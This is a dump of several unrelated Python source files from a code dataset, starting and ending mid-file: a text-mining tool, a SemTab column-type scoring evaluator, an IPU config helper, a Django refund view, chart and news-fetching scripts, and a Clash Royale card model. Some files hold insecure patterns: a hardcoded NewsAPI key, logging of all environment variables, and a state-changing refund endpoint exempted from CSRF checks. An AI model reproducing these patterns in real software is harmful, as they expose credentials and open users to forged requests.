import copyfile\n        self.logger.loglevel = logging.DEBUG\n\n        proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n        print(\"file\", proj_dir, os.path.exists(proj_dir))\n        self.run_commands([\n            \"--proj\", proj_dir,\n            \"--glob\", \"${proj}/*/fulltext.pd.txt\",\n            # \"--apply\", \"txt2sent\",\n            \"--outfile\", \"fulltext.pd.sn.txt\",\n            \"--split\", \"txt2para\",\n        ])\n\n    def test_split_oil26(self):\n\n        proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"resources\", \"oil26\"))\n        print(\"file\", proj_dir, os.path.exists(proj_dir))\n        self.run_commands([\n            \"--proj\", proj_dir,\n            \"--glob\", \"${proj}/*/fulltext.xml\",\n            \"--split\", \"xml2sect\",\n        ])\n\n    def test_filter(self):\n        from shutil import copyfile\n\n        proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n        print(\"file\", proj_dir, os.path.exists(proj_dir))\n        self.run_commands([\n            \"--proj\", proj_dir,\n            \"--glob\", \"${proj}/**/*_p.xml\",\n            \"--apply\", \"xml2txt\",\n            \"--filter\", \"contains(cell)\",\n            \"--combine\", \"concat_str\",\n            \"--outfile\", \"cell.txt\"\n        ])\n\n\n    def test_pdf2txt(self):\n        from shutil import copyfile\n\n        proj_dir = os.path.abspath(os.path.join(__file__, \"..\", \"tst\", \"proj\"))\n        assert os.path.exists(proj_dir), f\"proj_dir {proj_dir} exists\"\n        self.run_commands([\n            \"--proj\", proj_dir,\n            \"--glob\", \"${proj}/*/fulltext.pdf\",\n            \"--apply\", \"pdf2txt\",\n            \"--outfile\", \"fulltext.pd.txt\",\n            \"--assert\", \"file_glob_count(${proj}/*/fulltext.pd.txt,3)\"\n        ])\n\n    def run_tests(self):\n        # self.test_glob() # also does sectioning?\n\n        self.test_pdf2txt()\n        self.test_split_pdf_txt_paras()\n\n        # self.test_xml2sect()\n        # self.test_split_oil26()\n        # self.test_split_sentences()\n        # self.test_xml2sect()\n        # self.test_filter()\n\nclass SymbolIni:\n    \"\"\"processes config/ini files and stores symbols created\"\"\"\n    NS = \"${ns}\"\n    PARENT = \"__parent__\" # indicates parent directory of an INI or similar file\n    CONFIG = \"config\"\n    PYAMI = \"PYAMI\"\n    PRIMITIVES = [\"<class 'int'>\", \"<class 'bool'>\", \"<class 'float'>\", \"<class 'complex'>\"]\n    LOGDIR = \"logs\" # maybe need to change this\n\n    logger = None\n\n    def __init__(self, pyami):\n        FileLib.force_mkdir(self.LOGDIR)\n        self.logger = PyAMI.set_logger(\n            \"symbol_ini\", logger_level=logging.INFO, log_file=os.path.join(self.LOGDIR, \"symbol_ini.log\"))\n        self.symbols = None\n        self.pyami = pyami\n        pyami.symbol_ini = self\n\n        self.setup_environment()\n        self.process_config_files()\n\n    def process_config_files(self):\n        \"\"\" \"\"\"\n        # remove later\n        # config file is linked as PYAMI\n        self.pyami.args[self.CONFIG] = os.getenv(self.PYAMI)# \"/Users/pm286/pyami/config.ini\"\n        config_files_str = self.pyami.args.get(self.CONFIG)\n        config_files = [] if config_files_str is None else config_files_str.split(\",\")\n        self.symbols = {}\n        self.fileset = set()\n        for config_file in config_files:\n            self.logger.info(f\"processing config: {config_file}\")\n            self.process_config_file(config_file)\n        self.logger.debug(f\"symbols after config {self.symbols}\")\n\n    def process_config_file(self, config_file):\n        \"\"\"\n\n        :param config_file: \n\n        \"\"\"\n        import os\n        from file_lib import FileLib\n        if config_file.startswith(\"${\") and config_file.endswith(\"}\"): # python config file\n            file = os.environ[config_file[2:-1]]\n        elif \"/\" not in config_file:\n            file = os.path.join(FileLib.get_parent_dir(__file__), config_file)\n        elif config_file.startswith(\"~\"): # relative to home\n            home = os.path.expanduser(\"~\")\n            file = home + config_file[len(\"~\"):]\n        elif 
config_file.startswith(\"/\"): # absolute\n file = config_file\n else:\n file = None\n\n if file is not None:\n if os.path.exists(file):\n self.logger.debug(\"reading \" + file)\n self.apply_config_file(file)\n else:\n self.logger.warning(f\"*** cannot find config file {file} ***\")\n\n def apply_config_file(self, file):\n \"\"\"reads config file, recursively replaces {} symbols and '~'\n :file: python config file\n\n :param file: \n\n \"\"\"\n import configparser\n import os\n\n if file in self.fileset: # avoid cycles\n self.logger.debug(f\"{file} already in {self.fileset}\")\n return;\n else:\n self.fileset.add(file)\n\n self.config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n self.logger.info(f\"reading config file {file}\")\n files_read = self.config.read(file)\n sections = self.config.sections()\n for section in sections:\n self.convert_section_into_symbols_dict(file, section)\n\n self.check_targets_exist(file)\n self.recurse_ini_files()\n\n def check_targets_exist(self, file):\n \"\"\"\n\n :param file: \n\n \"\"\"\n for item in self.symbols.items():\n val = item[1];\n if val.startswith(\"http\"):\n if self.pyami.flagged(self.pyami.CHECK_URLS) :\n import urllib.request\n try:\n with urllib.request.urlopen(val) as response:\n html = response.read()\n except urllib.error.HTTPError as ex:\n print(f\"Cannot read {val} as url {ex}\")\n elif \"/\" in val: # assume slash means file or url\n if not os.path.exists(val): # all files\n self.logger.error(f\"{val} in {file} does not exist as file\")\n else:\n print(\"non-existent: \" + val + \" in \" + file)\n\n def setup_environment(self):\n \"\"\" \"\"\"\n for key in os.environ.keys():\n self.logger.info(f\"{key}: {os.environ[key]}\")\n\n def convert_section_into_symbols_dict(self, file, section):\n \"\"\"\n\n :param file: \n :param section: \n\n \"\"\"\n self.logger.info(\"============\" + section + \"============\" + file)\n for name in self.config[section].keys():\n if name in self.symbols:\n self.logger.debug(f\"{name} already defined, skipped\")\n else:\n raw_value = self.config[section][name]\n # make substitutions\n # we replace __file__ with parent dir of dictionary\n parent_dir = str(FileLib.get_parent_dir(file))\n if raw_value.startswith(\"~\"):\n # home directory on all OS (?)\n new_value = os.path.expanduser(\"~\") + raw_value[len(\"~\"):]\n elif raw_value.startswith(self.PARENT):\n # the prefix __file__ may have been expanded by the parser\n new_value = parent_dir + raw_value[len(self.PARENT):]\n elif raw_value.startswith(\"__file__\"):\n print(\"__file__ is obsolete \", file)\n else:\n new_value = raw_value\n\n if name.startswith(self.NS):\n name = os.environ[\"LOGNAME\"] + name[len(self.NS):]\n print(\"NAME\", name)\n\n self.symbols[name] = new_value\n\n self.logger.debug(f\"symbols for {file} {section}\\n {self.symbols}\")\n\n def recurse_ini_files(self):\n \"\"\"follows links to all *_ini files and runs them recursively\n \n does not check for cycles (yet)\n\n\n \"\"\"\n keys = list(self.symbols.keys())\n # print(\"KEYS\", keys)\n for name in keys:\n if name.endswith(\"_ini\"):\n if name not in self.symbols:\n self.logger.error(f\"PROCESSING {self.current_file} ; cannot find symbol: {name} in {self.symbols}\")\n else:\n file = self.symbols[name]\n self.apply_config_file(file)\n\n def replace_symbols(self, arg):\n \"\"\"\n\n :param arg: \n\n \"\"\"\n # print(f\"ARGLIST {type(arglist)} {arglist}\")\n if arg is None:\n return None\n elif isinstance(arg, str):\n new_arg = 
self.replace_symbols_in_arg(arg)\n print(f\"{arg} => {new_arg}\")\n return new_arg\n elif isinstance(arg, list):\n new_arg = []\n for item in arg:\n print(f\"SUBLIST_ITEM {item}\")\n new_item = self.replace_symbols_in_arg(item)\n new_arg.append(new_item)\n return new_arg\n elif self.is_primitive(arg):\n return arg\n else:\n print(f\"Cannot process arg {arg}\")\n return arg\n \n def is_primitive(self, arg):\n \"\"\"returns true if string of classtype is maps to int, bool, etc. Horrible\n\n :param arg: \n\n \"\"\"\n return str(type(arg)) in self.PRIMITIVES\n \n def replace_symbols_in_arg(self, arg):\n \"\"\"replaces ${foo} with value of foo if in symbols\n \n treats any included \"${\" as literals (this is probably a user error)\n\n :param arg: \n\n \"\"\"\n import re\n\n result = \"\"\n start = 0\n SYM_START = \"${\"\n SYM_END = \"}\"\n self.logger.info(f\"expanding symbols in {arg}\")\n while SYM_START in arg[start:]:\n idx0 = arg.index(SYM_START, start)\n result += arg[start:idx0]\n idx1 = arg.index(SYM_END, start)\n symbol = arg[idx0+len(SYM_START):idx1]\n replace = self.symbols.get(symbol)\n if replace != symbol:\n self.logger.debug(symbol, \" REPLACE\", replace)\n end = idx1 + 1\n result += replace if replace is not None else arg[idx0 : idx1 + len(SYM_END)]\n start = end\n result += arg[start:]\n if arg != result:\n self.logger.info(f\"expanded {arg} to {result}\")\n return result\n\n\n # return arg[2:-1] if arg.startswith(SYM_START) and arg.endswith(SYM_END) else arg\n\n def print_symbols(self):\n \"\"\" \"\"\"\n print(\"symbols>>\")\n for name in self.symbols:\n print(f\"{name}:{self.symbols[name]}\")\n\ndef main():\n \"\"\" main entry point for cmdline\n\n \"\"\"\n\n print(f\"\\n============== running pyami main ===============\\n{sys.argv[1:]}\")\n # this needs commandline\n pyami = PyAMI()\n pyami.run_tests()\n # pyami.run_commands(sys.argv[1:])\n\n\nif __name__ == \"__main__\":\n\n print(f\"sys.argv: {sys.argv}\")\n main()\n\nelse:\n\n print(\"running search main anyway\")\n main()\n","sub_path":"physchem/python/pyami.py","file_name":"pyami.py","file_ext":"py","file_size_in_byte":34198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78079652","text":"\"\"\"\r\nThe code is adapted from the official SemTab evaluator: https://github.com/sem-tab-challenge/aicrowd-evaluator\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport json\r\nimport os\r\nimport argparse\r\n\r\n# prefix1 = 'http://www.wikidata.org/entity/'\r\n# prefix2 = 'https://www.wikidata.org/wiki/'\r\n\r\n\r\nclass CTA_Evaluator:\r\n def __init__(self, answer_file_path, round=1):\r\n \"\"\"\r\n `round` : Holds the round for which the evaluation is being done.\r\n can be 1, 2...upto the number of rounds the challenge has.\r\n Different rounds will mostly have different ground truth files.\r\n \"\"\"\r\n self.answer_file_path = answer_file_path\r\n self.round = round\r\n\r\n def _evaluate(self, client_payload, gt_ancestor_fn, gt_descendent_fn, _context={}):\r\n \"\"\"\r\n `client_payload` will be a dict with (atleast) the following keys :\r\n - submission_file_path : local file path of the submitted file\r\n - aicrowd_submission_id : A unique id representing the submission\r\n - aicrowd_participant_id : A unique id for participant/team submitting (if enabled)\r\n \"\"\"\r\n submission_file_path = client_payload[\"submission_file_path\"]\r\n aicrowd_submission_id = client_payload[\"aicrowd_submission_id\"]\r\n aicrowd_participant_uid = 
client_payload[\"aicrowd_participant_id\"]\r\n\r\n gt_ancestor = json.load(open(gt_ancestor_fn))\r\n gt_descendent = json.load(open(gt_descendent_fn))\r\n\r\n cols, col_type = set(), dict()\r\n gt = pd.read_csv(self.answer_file_path, delimiter=',', names=['tab_id', 'col_id', 'type'],\r\n dtype={'tab_id': str, 'col_id': str, 'type': str}, keep_default_na=False)\r\n for index, row in gt.iterrows():\r\n col = '%s %s' % (row['tab_id'], row['col_id'])\r\n gt_type = row['type']\r\n\r\n \"\"\"\r\n Trim the entity prefix to avoid mismatching\r\n \"\"\"\r\n\r\n # if gt_type.startswith(prefix1):\r\n # gt_type = gt_type[len(prefix1):]\r\n #\r\n # if gt_type.startswith(prefix2):\r\n # gt_type = gt_type[len(prefix2):]\r\n\r\n col_type[col] = gt_type\r\n cols.add(col)\r\n\r\n annotated_cols = set()\r\n total_score = 0\r\n sub = pd.read_csv(submission_file_path, delimiter=',', names=['tab_id', 'col_id', 'annotation'],\r\n dtype={'tab_id': str, 'col_id': str, 'annotation': str}, keep_default_na=False)\r\n for index, row in sub.iterrows():\r\n col = '%s %s' % (row['tab_id'], row['col_id'])\r\n if col in annotated_cols:\r\n # continue\r\n raise Exception(\"Duplicate columns in the submission file\")\r\n else:\r\n annotated_cols.add(col)\r\n annotation = row['annotation']\r\n # if not annotation.startswith('http://www.wikidata.org/entity/'):\r\n # annotation = 'http://www.wikidata.org/entity/' + annotation\r\n\r\n \"\"\"\r\n Trim the entity prefix to avoid mismatching \r\n \"\"\"\r\n # if annotation.startswith(prefix1):\r\n # annotation = annotation[len(prefix1):]\r\n #\r\n # if annotation.startswith(prefix2):\r\n # annotation = annotation[len(prefix2):]\r\n\r\n if col in cols:\r\n max_score = 0\r\n for gt_type in col_type[col].split():\r\n ancestor = gt_ancestor[gt_type]\r\n ancestor_keys = [k.lower() for k in ancestor]\r\n descendent = gt_descendent[gt_type]\r\n descendent_keys = [k.lower() for k in descendent]\r\n if annotation.lower() == gt_type.lower():\r\n score = 1.0\r\n elif annotation.lower() in ancestor_keys:\r\n depth = int(ancestor[annotation])\r\n if depth <= 5:\r\n score = pow(0.8, depth)\r\n else:\r\n score = 0\r\n elif annotation.lower() in descendent_keys:\r\n depth = int(descendent[annotation])\r\n if depth <= 3:\r\n score = pow(0.7, depth)\r\n else:\r\n score = 0\r\n else:\r\n score = 0\r\n if score > max_score:\r\n max_score = score\r\n\r\n total_score += max_score\r\n\r\n precision = total_score / len(annotated_cols) if len(annotated_cols) > 0 else 0\r\n recall = total_score / len(cols)\r\n f1 = (2 * precision * recall) / (precision + recall) if (precision + recall) > 0 else 0.0\r\n\r\n main_score = f1\r\n secondary_score = precision\r\n\r\n print('%.3f %.3f %.3f' % (f1, precision, recall))\r\n\r\n \"\"\"\r\n Do something with your submitted file to come up\r\n with a score and a secondary score.\r\n \r\n if you want to report back an error to the user,\r\n then you can simply do :\r\n `raise Exception(\"YOUR-CUSTOM-ERROR\")`\r\n \r\n You are encouraged to add as many validations as possible\r\n to provide meaningful feedback to your users\r\n \"\"\"\r\n _result_object = {\r\n \"score\": main_score,\r\n \"score_secondary\": secondary_score\r\n }\r\n return _result_object\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--gt-dir\",\r\n type=str,\r\n required=True)\r\n parser.add_argument(\"--submission-fn\",\r\n type=str,\r\n required=True)\r\n args = parser.parse_args()\r\n # Lets assume the the ground_truth is a CSV file\r\n # and 
is present at data/ground_truth.csv\r\n # and a sample submission is present at data/sample_submission.csv\r\n answer_file_path = os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt.csv\")\r\n\r\n _client_payload = {}\r\n _client_payload[\"submission_file_path\"] = args.submission_fn\r\n _client_payload[\"aicrowd_submission_id\"] = 1123\r\n _client_payload[\"aicrowd_participant_id\"] = 1234\r\n\r\n # Instantiate a dummy context\r\n _context = {}\r\n # Instantiate an evaluator\r\n aicrowd_evaluator = CTA_Evaluator(answer_file_path)\r\n # Evaluate\r\n result = aicrowd_evaluator._evaluate(_client_payload,\r\n os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt_ancestor.json\"),\r\n os.path.join(args.gt_dir, \"HardTablesR3_CTA_WD_gt_descendent.json\"),\r\n _context)\r\n print(result)\r\n","sub_path":"papers/LinkingPark/Evaluator/Evaluator_2021/HardTable_Round3_CTA_WD_Evaluator.py","file_name":"HardTable_Round3_CTA_WD_Evaluator.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186590754","text":"# Copyright 2019 Graphcore Ltd.\nimport os\nfrom tensorflow.python.ipu import utils\nfrom tensorflow.python.ipu.utils import ExecutionProfileType\n\n\ndef get_config(prng=False,\n ipu_id=-1,\n shards=1,\n number_of_replicas=1,\n max_cross_replica_buffer_size=10*1024*1024,\n merge_infeed_io_copies=True,\n fp_exceptions=True,\n xla_recompute=False,\n seed=None,\n profile=None,\n availableMemoryProportion=None,\n stable_norm=False):\n \"\"\"Builds ipu_options\"\"\"\n\n profile_exec_modes = {\"NO_PROFILE\": ExecutionProfileType.NO_PROFILE,\n \"TILE_PROFILE\": ExecutionProfileType.TILE_PROFILE,\n \"DEVICE_PROFILE\": ExecutionProfileType.DEVICE_PROFILE,\n \"IPU_PROFILE\": ExecutionProfileType.IPU_PROFILE}\n\n config = utils.create_ipu_config(max_cross_replica_sum_buffer_size=max_cross_replica_buffer_size,\n merge_infeed_io_copies=merge_infeed_io_copies,\n always_rearrange_copies_on_the_host=False,\n profiling=profile is not None,\n profile_execution=profile_exec_modes[profile] if profile else None)\n\n if \"GCL_REAL_COLLECTIVES\" in os.environ:\n config = utils.set_gcl_options(config, num_io_tiles=128, gcl_options={\"useGclCollectives\": \"true\", })\n\n if ipu_id == -1:\n config = utils.auto_select_ipus(config, number_of_replicas*shards)\n else:\n config = utils.select_ipus(config, [ipu_id])\n config = utils.set_compilation_options(config, {\n \"device.clearAtomicFlagAfterExchange\": \"false\",\n \"prng.enable\": \"true\" if prng else \"false\",\n \"target.deterministicWorkers\": \"false\" if seed is None else \"true\",\n })\n\n if availableMemoryProportion is not None:\n config = utils.set_convolution_options(config, {\n \"availableMemoryProportion\": str(availableMemoryProportion)\n })\n\n if stable_norm:\n config = utils.set_norm_options(config, use_stable_statistics=True)\n\n if xla_recompute:\n utils.set_recomputation_options(config, allow_recompute=True)\n\n config = utils.set_floating_point_behaviour_options(config, inv=fp_exceptions, div0=fp_exceptions,\n oflo=fp_exceptions, esr=prng, nanoo=True)\n\n return config\n","sub_path":"applications/tensorflow/cnns/training/ipu_utils.py","file_name":"ipu_utils.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190024783","text":"from unittest import TestCase\nfrom models.priority import Priority\nfrom models.registration_message_filter import 
RegistrationMessageFilter\nfrom mock import Mock\n\n\nclass TestRegistrationMessageFilter(TestCase):\n\n def test_that_message_can_be_prioritized(self):\n mocked_steps_cache = Mock()\n mocked_steps_cache.has_text.return_value = True\n message_filter = RegistrationMessageFilter(mocked_steps_cache, \"any message\")\n\n priority = message_filter.prioritize()\n\n self.assertEqual(priority, Priority.HIGH)\n\n def test_that_text_message_gets_priotized_with_low_priority(self):\n mocked_steps_cache = Mock()\n mocked_steps_cache.has_text.return_value = False\n message_filter = RegistrationMessageFilter(mocked_steps_cache, \"any message\")\n\n priority = message_filter.prioritize()\n self.assertEqual(priority, Priority.LOW)","sub_path":"tests/unit/test_registration_message_filter.py","file_name":"test_registration_message_filter.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299793063","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.views.decorators.csrf import csrf_exempt\nfrom order.models import Order\nfrom django.conf import settings\n\n\nclient = settings.CLIENT\n\n\n@csrf_exempt\ndef order_refund_view(request):\n if request.user.is_authenticated:\n order_num = request.POST.get('order', None)\n line_id = request.POST.get('line', None)\n action = request.POST.get('action', None)\n print(order_num, type(order_num))\n if order_num:\n order = Order.objects.get(number=order_num)\n print(order)\n if action == 'partial':\n line = order.lines.get(id=int(line_id))\n # client.refund(plan_id=3000000020219, new_purchase_price=655.00)\n print(line)\n if line.req_refund_status == '0':\n line.req_refund_status = '1'\n line.save()\n order.save()\n return JsonResponse({'status': 200, 'message': 'The order has been refunded Successfully',\n 'action': 'partial'})\n elif action == 'full':\n if order.is_refund_all == '0':\n order.is_refund_all = '1'\n for line in order.lines.all():\n if line.req_refund_status == '0':\n line.req_refund_status = '1'\n line.save()\n elif order.is_refund_all == '1':\n return JsonResponse(\n {'status': 200, 'message': 'The order has been already refunded', 'action': 'full'})\n elif order.is_refund_all == '3':\n return JsonResponse(\n {'status': 200, 'message': 'Your full refund request has been canceled', 'action': 'full'})\n elif order.is_refund_all == '4':\n return JsonResponse(\n {'status': 200, 'message': 'The order has been already dispatched. 
So, refund is not possible',\n 'action': 'full'})\n order.save()\n return JsonResponse({'status': 200, 'message': 'The request for full refund has been done Successfully',\n 'action': 'full'})\n else:\n return JsonResponse({'status': 400, 'message': 'Order not found'})\n else:\n return JsonResponse({'status': 401, 'message': 'User is not authenticated.'})\n\n","sub_path":"experimental/OscarAPI/oscar_proj/customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"239311887","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nmy_dpi = 100\nbarWidth = 0.4\nGender = ['Male', 'Female']\n\ndf = pd.read_csv(\"/home/sonali/CHOP_exercises/Section2/Q2/total_patients_demographics/stacked2.csv\")\nM = df.iloc[:,1].tolist()\nF = df.iloc[:,2].tolist()\nM = [int(i) for i in M]\nF = [int(i) for i in F]\nnames = df.iloc[:,0].tolist()\nr = np.arange(len(names))\n\nbars = np.add(M, F).tolist()\n\nplt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\nplt.bar(r, M, color='#7f6d5f', edgecolor='white', width=barWidth)\nplt.bar(r, F, bottom=M, color='#557f2d', edgecolor='white', width=barWidth)\n\nplt.xticks(r, names, size = 10,rotation=30)\nplt.legend(Gender, loc=2)\nplt.xlabel('Age Groups', fontsize=10)\nplt.ylabel('# of patients', fontsize=10)\nplt.title('Total Number of patients across age groups & gender (irrespective of diagnosis/ encounter)',fontsize=10)\nplt.savefig('/home/sonali/CHOP_exercises/Section2/Q2/total_patients_demographics/stacked_bar_total_patients.pdf', dpi=my_dpi)\n\n","sub_path":"Section2/Q2/total_patients_demographics/chop-data_vis3.py","file_name":"chop-data_vis3.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"237449022","text":"from newsapi.newsapi_client import NewsApiClient\nimport sys\nimport pandas as pd\nimport itertools\nimport tweepy\n\n# Credentials for APIs\n\n# NewsAPI\nnewsapi = NewsApiClient(api_key=\"82a3d51da38f4c48ae8a375ab0246e80\")\nnews_sources = newsapi.get_sources()\n\n# Cannot go over 500 hits in a day. 
1 hit for every permutation.\n\n# Race\nrace_list = ['black lives matter', 'racial inequity', 'racial oppression']\nrace_news_data = []\n\n# Environment\nenvironment_list = ['climate change', 'sustainability', 'green energy', 'global warming']\nenvironment_news_data = []\n\n# Addiction\naddiction_list = ['drug addiction', 'alcohol addiction']\naddiction_news_data = []\n\n# Current Hot Topics\ncurrent_list = ['india farmers', 'myanmar', 'asian-american hate']\ncurrent_news_data = []\n\n# LGBT\nlgbt_list = ['lgbt rights', 'gay rights', 'transgender rights', 'gay marriage']\nlgbt_news_data = []\n\n# Poverty\npoverty_list = ['poverty', 'homeless right']\npoverty_news_data = []\n\n# Refugee\nrefugee_list = ['refugee rights']\nrefugee_news_data = []\n\n# Womens Rights\nwomen_list = ['female wages', 'womens rights']\nwomen_news_data = []\n\n# Mental Health\nmental_list = ['mental health', 'mental illness', 'coping with mental illness', 'living with anxiety']\nmental_news_data = []\n\n# Disability rights\ndisability_list = ['Disability rights']\ndisability_news_data = []\n\n\n# Generate query template\ndef query_generator(kwd, data):\n all_articles = newsapi.get_everything(\n q=kwd,\n language='en',\n )\n for article in all_articles['articles']:\n data.append([article['source']['name'], article['title'], article['author'],\n article['description'], article['publishedAt'], article['url'], article['urlToImage'],\n article['content']])\n\n\n# Generate query for each permutation\ndef get_all_article_queries(use_list, newsdata):\n for item in use_list:\n query_generator(item, newsdata)\n\n\n# Function to create dataframe for articles from each topic area\ndef CreateArticledf(key_list, newsdata):\n news_col_names = ['Source', 'Title', 'Author', 'Description', 'Pub_Date', 'url', 'urlToImage', 'Content']\n get_all_article_queries(key_list, newsdata)\n News_DF = pd.DataFrame(newsdata, columns=news_col_names)\n News_DF.drop_duplicates().sort_values(by=['Pub_Date'], ascending=False)\n return (News_DF)\n\n#Race Tweets\nrace_art_df = CreateArticledf(race_list,race_news_data)\n\n#Environment Tweets\nenv_art_df = CreateArticledf(environment_list,environment_news_data)\n\n#Current Tweets\ncur_art_df = CreateArticledf(current_list,current_news_data)\n\n#LGBT Tweets\nlgbt_art_df = CreateArticledf(lgbt_list,lgbt_news_data)\n\n#Poverty Tweets\npov_art_df = CreateArticledf(poverty_list,poverty_news_data)\n\n#Refugee Tweets\nref_art_df = CreateArticledf(refugee_list,refugee_news_data)\n\n#Womens Rights Tweets\nwom_art_df = CreateArticledf(women_list,women_news_data)\n\n#Mental Health Tweets\nmen_art_df = CreateArticledf(mental_list,mental_news_data)\n\n#Disability Tweets\ndis_art_df = CreateArticledf(disability_list,disability_news_data)","sub_path":"app/api/REST/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"601473182","text":"\n# === Tools for modeling the Clash Royale universe ===\n\n# for later use\nclass Card:\n\n def __init__(self, name):\n self.name = name\n # dictionary containing a weight for each link to another card\n self.links = {}\n\n def getMostUsedWith(self, count=1):\n return sorted(self.links, key=self.links.get, reverse=True)[:count]\n\n def getUsageWith(self, other):\n if other in self.links:\n return self.links[other]\n else:\n return None\n\n def getLeastUsedWith(self):\n return min(self.links, key=self.links.get)\n\n def getMaxWeight(self):\n return 
max(self.links.values())\n\n # number of links attached\n def getDegree(self):\n return len(self.links)\n\n # sum of weights over all attached links\n def getStrength(self):\n return round(sum(self.links.values()), 3)\n\n# for later use\nclass Deck:\n\n # add some persistent variable here\n def __init__(self, player, trophies, result, opponent):\n self.player = player\n self.trophies = trophies\n self.result = result\n self.opponent = opponent\n\n def getPlayer(self):\n return self.player\n\n def getTrophies(self):\n return self.trophies\n\n def getBattleResult(self):\n return self.result\n\n def getOpponent(self):\n return self.opponent\n\n\ndef create_empty_graph():\n \"\"\"\n :return: an empty graph network where the node attributes model the reality of the game.\n \"\"\"\n\n # There's really two layers of this:\n # - The node attributes establish the nature of the game.\n # - The edges represent usages between cards.\n\n # More pushed decks -> better data representation\n\n # How do we define node attributes to model abilities?, i.e. we cannot hardcode 'drop rage-spell on death'.\n # The attributes should attempt to naturally represent our environment. What are our hyper-parameters?\n\n # - Explicit: rarity, cost, count, targets, range, hitspeed, speed, ~health, ~damage\n # - Implicit: flying, placement (regular, any), building\n\n # Health and damage depend on card level, but this can be dealt with later. Do we assume stats from max level?\n\n\n import networkx as nx\n G = nx.Graph()\n\n G.add_node('ThreeMusketeers',\n rarity='Rare',\n cost=9,\n count=3,\n targets='Air&Ground',\n flying=False,\n range=6.0,\n hitspeed=1.1,\n speed='Medium'\n )\n\n G.add_node('Golem',\n rarity='Epic',\n cost=8,\n count=1,\n targets='Buildings',\n flying=False,\n range=2.0,\n hitspeed=2.5,\n speed='Slow'\n )\n\n G.add_node('RoyalRecruits',\n rarity='Common',\n cost=7,\n count=6,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.3,\n speed='Medium'\n )\n\n G.add_node('PEKKA',\n rarity='Epic',\n cost=7,\n count=6,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.3,\n speed='Medium'\n )\n\n G.add_node('LavaHound',\n rarity='Legendary',\n cost=7,\n count=1,\n targets='Buildings',\n flying=True,\n range=3.5,\n hitspeed=1.3,\n speed='Slow'\n )\n\n G.add_node('MegaKnight',\n rarity='Legendary',\n cost=7,\n count=1,\n targets='Ground',\n flying=False,\n range=2,\n hitspeed=1.7,\n speed='Medium'\n )\n\n G.add_node('RoyalGiant',\n rarity='Common',\n cost=6,\n count=1,\n targets='Buildings',\n flying=False,\n range=5.0,\n hitspeed=1.7,\n speed='Slow'\n )\n\n G.add_node('EliteBarbarians',\n rarity='Common',\n cost=6,\n count=2,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.7,\n speed='VeryFast'\n )\n\n G.add_node('GiantSkeleton',\n rarity='Epic',\n cost=6,\n count=1,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.5,\n speed='Medium'\n )\n\n G.add_node('GoblinGiant',\n rarity='Epic',\n cost=6,\n count=1,\n targets='Buildings',\n flying=False,\n range=2.0,\n hitspeed=1.7,\n speed='Medium'\n )\n\n G.add_node('Sparky',\n rarity='Legendary',\n cost=6,\n count=1,\n targets='Ground',\n flying=False,\n range=5.0,\n hitspeed=4.0,\n speed='Slow'\n )\n\n G.add_node('EliteBarbarians',\n rarity='Common',\n cost=5,\n count=5,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.4,\n speed='Medium'\n )\n\n G.add_node('MinionHorde',\n rarity='Common',\n cost=5,\n count=6,\n targets='Air&Ground',\n flying=True,\n range=2.0,\n hitspeed=1.0,\n speed='Fast'\n )\n\n # 
ISSUES\n G.add_node('Rascals',\n rarity='Common',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=True,\n range=2.0,\n hitspeed=1.0,\n speed='Medium'\n )\n\n G.add_node('Balloon',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Buildings',\n flying=True,\n range=2.0,\n hitspeed=3.0,\n speed='Medium'\n )\n\n G.add_node('Witch',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=False,\n range=5.0,\n hitspeed=1.1,\n speed='Medium'\n )\n\n G.add_node('Prince',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=2.0,\n hitspeed=1.4,\n speed='Medium'\n )\n\n G.add_node('Bowler',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=5.0,\n hitspeed=2.5,\n speed='Slow'\n )\n\n G.add_node('Executioner',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=False,\n range=4.5,\n hitspeed=2.4,\n speed='Medium'\n )\n\n G.add_node('CannonCart',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Ground',\n flying=False,\n range=5.5,\n hitspeed=1.0,\n speed='Fast'\n )\n\n G.add_node('ElectroDragon',\n rarity='Epic',\n cost=5,\n count=1,\n targets='Air&Ground',\n flying=True,\n range=3.5,\n hitspeed=2.1,\n 